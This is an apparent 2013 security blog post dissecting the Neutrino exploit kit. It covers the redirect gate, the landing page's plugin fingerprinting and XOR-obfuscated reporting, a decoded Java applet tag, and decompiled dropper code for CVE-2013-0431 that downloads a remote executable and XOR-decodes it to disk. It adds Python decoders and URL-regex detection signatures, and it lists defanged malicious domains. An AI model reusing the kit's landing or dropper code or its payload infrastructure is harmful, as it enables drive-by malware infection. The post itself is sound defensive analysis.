Friday, May 10, 2013

Neutrino Exploit Kit analysis


I have previously looked at the Neutrino landing page: Neutrino landing page demystified and Neutrino landing pane change.
There are obviously quite a few live Neutrino kits out there, so it is time to take a closer look at this evil piece of software. Let's see if we can figure out what these bad actors are up to and make sure we can detect activity related to the Neutrino exploit kit.



1. Gate


Neutrino has a gate which you have to pass to reach the landing pane. You normally arrive at the gate through a chain of hacked sites that redirect you. The gate serves HTML that moves you on to the landing pane, which fingerprints your client and looks for a way to exploit you. If you have the URL of the gate and a valid Referer you can fetch valid URLs to the landing:

--2013-05-07 --  hxxp:// www.leritsuwa.biz/cust_gw/ads_m/show_bn.c.php?sid=27982987
Resolving www.leritsuwa.biz... 77.81.183.98
Connecting to www.leritsuwa.biz|77.81.183.98|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 402 [text/html]
Saving to: `c2_1.php'

     0K                                                       100% 24.7M=0s

2013-05-07 (24.7 MB/s) - `c2_1.php' saved [402/402]



<HTML><HEAD><title>Canadian Pharmacies Buy Generic Drugs Prescription International Online Pharmacy Drugstore</title><meta http-equiv="refresh" content="20;url=hxxp:// www.expressmedscanada.com/?id=15&group=158"></HEAD><FRAMESET rows="100%" BORDER=0 FRAMEBORDER=0 FRAMESPACING=0><FRAME NAME="fi20o3893jhms" SRC="hxxp:// milk-cocoa.info/lghvewgr?foyuhtmbcj=3800964"><noframes></noframes></FRAMESET></HTML>


Over time you will get new URLs to the landing pane:

hxxp: //milk-cocoa.info/lskbiqp?frglxucscol=3800964
hxxp: //milk-cocoa.info/lhdlqxyl?fbljocmikem=3800964
hxxp: //milk-cocoa.info/lsbqfqw?frovckttsq=3800964
hxxp: //milk-cocoa.info/liwmlvf?fehbyxmtxg=3800964
hxxp: //milk-cocoa.info/ltkirxwniohper?fgcycebw=3800964
hxxp: //freshaircleaner.org/lkyjngdxnteuq?fmcmkkkrl=3800964
hxxp: //borlanove.net/lxfyvqlynuq?fofgfj=3800964
hxxp: //ufohuntersde.com/lwjreshxkq?fwvpxubwtskl=3800964
hxxp: //ufohuntersde.org/luimkvtrqdjcp?fdekcxhep=3800964
hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964
hxxp: //ufohuntersde.org/lupofx?fowxcseexqhx=3800964
hxxp: //ufohuntersde.info/lxinmt?fdsrfeodpqr=3800964
hxxp: //ufohuntersde.info/lcgdqbnvox?futqfwvjjm=3800964
hxxp: //ufohuntersde.info/lhpixuskkvx?fgtujfccrw=3800964
hxxp: //ufohuntersde.info/lumqnhjb?fjoywbpcihk=3800964
hxxp: //morabudac.com/ldqumpgiqlrgh?flobicxfnq=3800964


I have however noticed that the 7 digit number in the f{random-length lowercase string} parameter stays the same over time. The URLs to the landing are also reused.

2. Landing pane


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   АН602(
    '51895b4daaa2ccbb52175bd0', 
    'wvwyk', 
    'ckjktkjbjz',
    'pmoqfbqjzr',
    'ifhebqbx'    
   );
  });

  function АН602(hid, pass, cph, xpn, ipn) {
   var info = {
    hid : hid,
    plugins : {
     adobe_reader: PluginDetect.getVersion('AdobeReader'),
     java: PluginDetect.getVersion('Java'),
     flash: PluginDetect.getVersion('Flash'),
     quick_time: PluginDetect.getVersion('QuickTime'),
     real_player: PluginDetect.getVersion('RealPlayer'),
     shockwave: PluginDetect.getVersion('Shockwave'),
     silver_light: PluginDetect.getVersion('Silverlight'),
     vlc: PluginDetect.getVersion('VLC'),
     wmp: PluginDetect.getVersion('WMP')
    }
   };

   var obj = {};
   obj[xpn] = pass;
   obj[ipn] = encodeURIComponent(xor(JSON.stringify(info), pass));
   
   $.post(cph, obj, function(data, status){
    $("body").append(xor(decodeURIComponent(data), pass));
   });
   
  }

  function xor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };
 </script> 
</head>
<body>
</body>
</html>




This we recognize from the post Neutrino landing pane change, or a variation of it. The jQuery and plugin_detector parts are documented in Neutrino landing page demystified.


3. Start the more evil stuff

The landing pane reports what is installed on your computer and fetches JavaScript code that in turn fetches the exploits.




The HTTP POST request is covered in earlier posts.

What do we get back?


K%05%14%0B%02%07%02W%15%0A%19%11%02%18%0C%12KP3%0A%01%17%04%1A%19%1E%06%03%5EU%7D%7F~pb~%1F%11YCP%3B%1E%1A%19%18%05%18%1F%1FW%3F%19%0D%0E%05%18%12%0DK2%0E%07%15%04%05%13%05%5EKJKW%17%0A%01%1F%10%18%1F%18%04Y%18%1B%078%16%14%0E%5EV%0Csb~%7F~pb%13%19%14%0C%06%12%18%03W%1C%05%1F%03%1CCPJ%16%09%1B%1B%13%03Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUHK%09%0A%05%17%1AY%05%16%1B%12DI%12%0E%12%1AIW%16%15%1E%12KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIIJ%07%18%19%16%1BW%17%0A%1A%13J%5B%13%1C%13%0E%5BK%01%17%1B%0C%0EJT%06%12%12%02TIED%16%06%07%15%0E%03HPPP%7D%7F~pb~%0BW%1C%07%04%13W%02a~%7F~pb~%12%18%1A%1E%1A%13%19%0DE%04%1E%0D%0E_QK%1C%06%15%13%13Y%04%15%1C%12%1A%1FJT6%1B%08Y%12%16%0DIW%02%0E%09%0EJT%16%09%1B%1B%1F%14%18%1F%1E%19%19V%13Z%1C%16%0F%0AZ%17%07%09%07%12%02L%0F%0E%05%05%1E%16%05JGYOIW%17%05%1A%03%1E%12DI%1F%02%03%09QXY%1A%10%07%1C%5B%14%16%08%18%17Y%1A%04%1AY%12%08%13%05%1E%05%1E%06%1F%07%1B%09T%1F%1A%0D%0F%08%07%17JLZOOB%1B_%13%17%16%18Y%14%15%15%1B%5EEG%40L%09%13FUY%1C%1E%12%03%11VUGG%5BK%1F%13%1E%1E%03%03KUH%5BUV%12%01%0E%14KU%18%23%25F%14%3D%04%01%3AEH%1B%151%04%0D2EO%1D%1BY2%03.KR%03%3AD%3B%03%14%3E9%03%0E%200%0E%23%3C%07%07%15K%21%1F%26E%11%5B%16%21%25%11%0F%20%02%0F%29%3F%22%0E8%3DF%2F%1D%2B.%211%11%26%1A8%1D%20%06%3EG%3A%13.D8%203%3A7JDIW%0E%1C%1C%12JT%06%12%12%02TIED%12%1B%15%1C%0FIQ%5EBa~%7F~pb%0A%7C~pb~JX%0A%08%05%1F%07%0DU%7D%7F~


We need to URL-decode the answer and XOR it to understand what the bad guys are throwing at us. We have the XOR key from the landing page (the second argument passed to АН602).
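As an added example (my own Python, not the kit's code), this does that decode step offline: URL-decode, then repeating-key XOR with the landing key 'wvwyk', mirroring the page's xor(decodeURIComponent(data), pass). The reverse direction, the client report the landing page POSTs, is included as well. The embedded body is the opening fragment of the response captured above.

```python
from urllib.parse import quote, unquote_to_bytes

# Second argument of the АН602() call on the landing page: the XOR key
LANDING_KEY = b"wvwyk"

# Opening fragment of the URL-encoded POST response captured above
RESPONSE_PREFIX = (
    "K%05%14%0B%02%07%02W%15%0A%19%11%02%18%0C%12KP3%0A%01%17%04%1A%19%1E%06%03%5EU"
    "%7D%7F~pb~%1F%11YCP%3B%1E%1A%19%18%05%18%1F%1FW%3F%19%0D%0E%05%18%12%0DK2%0E"
    "%07%15%04%05%13%05%5EKJKW%17%0A%01%1F%10%18%1F%18%04Y%18%1B%078%16%14%0E%5EV%0C"
)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same loop as the landing page's xor(input, pass)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_response(body: str, key: bytes) -> str:
    """Server -> client: xor(decodeURIComponent(data), pass)."""
    return xor_bytes(unquote_to_bytes(body), key).decode("latin-1")


def encode_client_report(report_json: str, key: bytes) -> str:
    """Client -> server: encodeURIComponent(xor(JSON.stringify(info), pass))."""
    return quote(xor_bytes(report_json.encode("latin-1"), key), safe="")


if __name__ == "__main__":
    print(decode_response(RESPONSE_PREFIX, LANDING_KEY))
```

Run against the full response body from the post, decode_response yields the script shown in the next section.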



<script language='Javascript'>

if ('Microsoft Internet Explorer' == navigator.appName) {
document.write('<applet object="Abc.dat" archive="hxxp:// milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4
daaa2ccbb52175bd0" width="10" height="10"><param name="exec" value="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNj
YmI1MjE3NWJkMA=="><param name="xkey" value="qkyu"></applet>');
} else {
document.write('<embed object="Abc.dat" type="application/x-java-applet;version=1.6" archive="hxxp:/
/ milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4daaa2ccbb52175bd0" width="10" height="10" exec="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRh
dWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==" xkey="qkyu"></embed>');


As expected, they want us to run some Java code.

4. URL to the final payload


In the applet tag the "exec" parameter holds the URL of the final malware payload. It is base64 encoded, so we need to decode it:



hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0
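Pulling these values out by hand works once; an added Python extractor (my code, not the kit's) handles both the applet and the embed form of the tag above, base64-decodes exec under the same "does not start with http" rule the applet's Java uses, and reports the URLs defanged the way this post does. The markup below is the applet written by the decoded script, with the base64 value unwrapped.

```python
import base64
from html.parser import HTMLParser

# Applet markup written by the decoded script above (hxxp kept as on the page,
# the base64 value is the unwrapped string from section 7)
APPLET_HTML = (
    '<applet object="Abc.dat" archive="hxxp://milk-cocoa.com/eqxrhrgmhqlp'
    '?hlzvcpa=51895b4daaa2ccbb52175bd0" width="10" height="10">'
    '<param name="exec" value="aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpq'
    'b2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==">'
    '<param name="xkey" value="qkyu"></applet>'
)


class AppletParamParser(HTMLParser):
    """Collects archive/exec/xkey from the <applet><param> and <embed> forms."""

    def __init__(self):
        super().__init__()
        self.params = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("applet", "embed"):
            for name in ("archive", "exec", "xkey"):
                if name in attrs:
                    self.params[name] = attrs[name]
        elif tag == "param" and "name" in attrs and "value" in attrs:
            self.params[attrs["name"]] = attrs["value"]


def defang(url):
    """Report URLs the way this post does, so nothing here is clickable."""
    return url.replace("http", "hxxp", 1) if url else url


def extract_payload_info(fragment):
    """Return the JAR URL, the decoded payload URL and the XOR key from the tag."""
    parser = AppletParamParser()
    parser.feed(fragment)
    exec_value = parser.params.get("exec", "")
    # Same rule the applet's Java applies: not starting with "http" means base64
    if exec_value and not exec_value.startswith("http"):
        exec_value = base64.b64decode(exec_value).decode("utf-8")
    return {
        "jar_url": defang(parser.params.get("archive")),
        "payload_url": defang(exec_value),
        "xkey": parser.params.get("xkey"),
    }
```

Note that both URLs carry the same 24-hex "hid" value the landing page reported, which is the hook the network patterns in section 8 key on.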


5. Malware


Start of the malware file:





This is, also as expected, obfuscated, and we need to go into the Java code to figure it out.

6. Java code CVE


The Java code exploits CVE-2013-0431, as described by Rapid7 here.





7. Java code deobfuscation


First the payload URL decoding: get the parameter value of exec and base64 decode it:


// The applet's "exec" parameter carries the URL of the final payload
String str1 = getParameter("exec");
if ((str1 == null) || (str1.length() == 0))
  System.exit(0);
byte[] localObject3; // decompiler showed this as Object; decodeBuffer returns byte[]
// A value that does not already start with "http" is base64 encoded
if (!str1.startsWith("http"))
  try
  {
    BASE64Decoder localBASE64Decoder = new BASE64Decoder();
    localObject3 = localBASE64Decoder.decodeBuffer(str1);
    str1 = new String(localObject3, "UTF-8");


String:

aHR0cDovL21pbGstY29jb2EuY29tL3BhcHNzeWFyZWpqb2JhP2h0aWRhdWtxPTUxODk1YjRkYWFhMmNjYmI1MjE3NWJkMA==

Decoded: hxxp:// milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0

Where is the file saved:


// The payload is dropped to a temp file named ~tmp<random>.exe
File localFile = File.createTempFile("~tmp", ".exe");
FileOutputStream localFileOutputStream = new FileOutputStream(localFile);

Get the xor key and deobfuscate the downloaded file:


// "xkey" is the XOR key; arrayOfByte2 holds the downloaded, obfuscated payload
String str3 = getParameter("xkey");
if ((str3 != null) && (str3.length() != 0))
{
  byte[] arrayOfByte3 = new byte[arrayOfByte2.length];
  arrayOfByte3 = xwk(arrayOfByte2, str3.getBytes("ISO_8859_1"));
  localFileOutputStream.write(arrayOfByte3);
}

// Repeating-key XOR: the key index wraps around when its end is reached
public byte[] xwk(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)
{
  byte[] arrayOfByte = new byte[paramArrayOfByte1.length];
  for (int i = 0; i < paramArrayOfByte1.length; i++)
    arrayOfByte[i] = (byte)(paramArrayOfByte1[i] ^ paramArrayOfByte2[(i % paramArrayOfByte2.length)]);
  return arrayOfByte;
}



Iterate over the downloaded file, XOR it with the key byte by byte, and start over from the beginning of the key when its end is reached.

Python is perfect for this:


#@malforsec py script to decode Neutrino bin files
def main():
  key = b'qkyu'  # value of the applet's "xkey" parameter
  # Read and write in binary mode so bytes above 0x7F are not re-encoded
  with open('neutrino.bin', 'rb') as f1:
    inf = f1.read()
  # Repeating-key XOR, same as xwk() in the Java code
  exefile = bytes(inf[i] ^ key[i % len(key)] for i in range(len(inf)))
  with open('neutrino.exe', 'wb') as outf:
    outf.write(exefile)

if __name__ == "__main__":
    main()


Did we get it right:

0000000: 4d5a c290 0003 0000 0004 0000 00c3 bfc3  MZ..............
0000010: bf00 00c2 b800 0000 0000 0000 4000 0000  ............@...
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: c390 0000 000e 1fc2 ba0e 00c2 b409 c38d  ................
0000050: 21c2 b801 4cc3 8d21 5468 6973 2070 726f  !...L..!This pro
0000060: 6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
0000070: 756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
0000080: 0d0a 2400 0000 0000 0000 4360 c291 c2af  ..$.......C`....
0000090: 0701 c3bf c3bc 0701 c3bf c3bc 0701 c3bf  ................
00000a0: c3bc 20c3 87c2 82c3 bc06 01c3 bfc3 bc07  .. .............
00000b0: 01c3 bec3 bc6d 01c3 bfc3 bc20 c387 c284  .....m..... ....
00000c0: c3bc 0801 c3bf c3bc 20c3 87c2 85c3 bc06  ........ .......
00000d0: 01c3 bfc3 bc20 c387 c292 c3bc 1101 c3bf  ..... ..........

Oh yeah, that's an exe file.


VirusTotal for the exe: 2/46

VirusTotal for the JAR: 2/45

8. Network detection


Let's have a look at @malwaresigs and see if we get the same. The old signature description still looks valid. The HTTP POST request has changed, as the "hid" (host id) variable is now incorporated in the URL-encoded part.

Looks like we can be more specific on:

*Change in patterns - spotted by @Set_Abominae 2013-05-15 - URLQuery

JARs: /(c|e)[a-z0-9]{1,11}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

EXEs: /(d|p)[a-z0-9]{1,16}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

landing: /(a|l)[a-z0-9]{1,16}\?(f|q)[a-z0-9]{1,12}=[0-9]{7}$

*Let's see if the change in URL patterns continues. If so, revert to the signatures over at @malwaresigs.


Update 2013-05-15
I have observed more patterns matching what @Set_Abominae reported yesterday.

Update 2013-07-29
The URL patterns keep changing. Thanks to @urlquery and @node5 for providing samples!
JARs: /m[a-z0-9]{1,11}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{0,9})$
EXEs: /j[a-z0-9]{1,16}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$
landing: /s[a-z0-9]{1,16}\?d[a-z0-9]{1,12}=[0-9]{7}$
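To check that these patterns actually fire on the traffic in this post, here is an added Python detector (my code, not from @malwaresigs or URLQuery) that runs both the May and the July pattern sets over the path and query of each URL in a constructed proxy log: the landing, JAR and EXE URLs from above, one benign look-alike, and one constructed URL in the July landing shape.

```python
import re
from urllib.parse import urlsplit

# The URL patterns posted above, keyed by the date each set was reported
NEUTRINO_URL_PATTERNS = {
    "2013-05-15": {
        "jar": r"/(c|e)[a-z0-9]{1,11}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$",
        "exe": r"/(d|p)[a-z0-9]{1,16}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$",
        "landing": r"/(a|l)[a-z0-9]{1,16}\?(f|q)[a-z0-9]{1,12}=[0-9]{7}$",
    },
    "2013-07-29": {
        "jar": r"/m[a-z0-9]{1,11}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{0,9})$",
        "exe": r"/j[a-z0-9]{1,16}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$",
        "landing": r"/s[a-z0-9]{1,16}\?d[a-z0-9]{1,12}=[0-9]{7}$",
    },
}


def classify_url(url):
    """Return [(pattern_date, artifact), ...] for every pattern the path+query matches."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    return [
        (date, artifact)
        for date, group in NEUTRINO_URL_PATTERNS.items()
        for artifact, pattern in group.items()
        if re.search(pattern, target)
    ]


def scan_proxy_log(lines):
    """Yield (url, hits) for each line whose last field is a URL matching a pattern."""
    for line in lines:
        url = line.split()[-1]
        hits = classify_url(url)
        if hits:
            yield url, hits


# Constructed proxy log in a "timestamp client url" layout: three URLs from this
# post, one benign look-alike, and one constructed URL in the July landing shape
SAMPLE_LOG = """\
2013-05-07T10:01:02 10.0.0.5 hxxp://milk-cocoa.info/lskbiqp?frglxucscol=3800964
2013-05-07T10:01:03 10.0.0.5 hxxp://milk-cocoa.com/eqxrhrgmhqlp?hlzvcpa=51895b4daaa2ccbb52175bd0
2013-05-07T10:01:04 10.0.0.5 hxxp://milk-cocoa.com/papssyarejjoba?htidaukq=51895b4daaa2ccbb52175bd0
2013-05-07T10:02:00 10.0.0.5 hxxp://www.example.com/lookup.php?q=3800964
2013-07-29T09:00:00 10.0.0.7 hxxp://example.net/s7kqwe?dplm=3800964
""".splitlines()
```

The landing, JAR and EXE hits from one client within seconds of each other are the sequence worth alerting on; a single landing-shaped URL on its own is the noisier signal.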

Happy analyzing and detecting Neutrino Exploit Kit activity :)

Neutrino references:
@kafein over at malware.dontneedcoffee.com has good stuff on Neutrino too.

Post publish reading:
blog.unmaskparasites.com - "Rotating iframe urls - one a minute"
malwaremustdie - "Knockin' on Neutrino Exploit Kit's door.."


2 comments:

  1. Does this sploitpack decode the obfuscated EXE directly into memory to avoid AV detection?

  2. If I understand your question correctly: the obfuscation will protect from detection so no need for any trick there.
    The exe file is saved to disk. That's normally when AV kicks in to check files (on-access scanning).
    But yes, the obfuscated file is read in, deobfuscated and written to disk. And remember the Java code runs in privileged mode.

    That's my view. If anyone sees it differently please let me know.
